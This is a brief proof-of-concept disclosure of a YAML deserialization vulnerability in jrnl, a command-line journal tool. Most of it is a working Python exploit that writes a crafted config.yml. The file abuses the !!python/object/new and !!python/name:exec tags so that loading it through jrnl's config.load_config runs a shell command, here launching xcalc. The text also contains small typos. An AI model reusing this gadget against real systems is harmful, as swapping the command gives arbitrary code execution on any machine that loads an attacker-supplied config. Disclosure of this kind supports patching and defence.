jrnl is a simple journal application for the command line., which is vulnerable to Arbitary Code Execution.
Vulnerable to YAML deserialization attack caused by unsafe loading.
pip install jrnl
import os
#os.sysem('pip3 install jrnl')
from jrnl import config
payload = """cmd: !!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(payload)
config.load_config('config.yml')
python3 exploit.pyArbitary Code Execution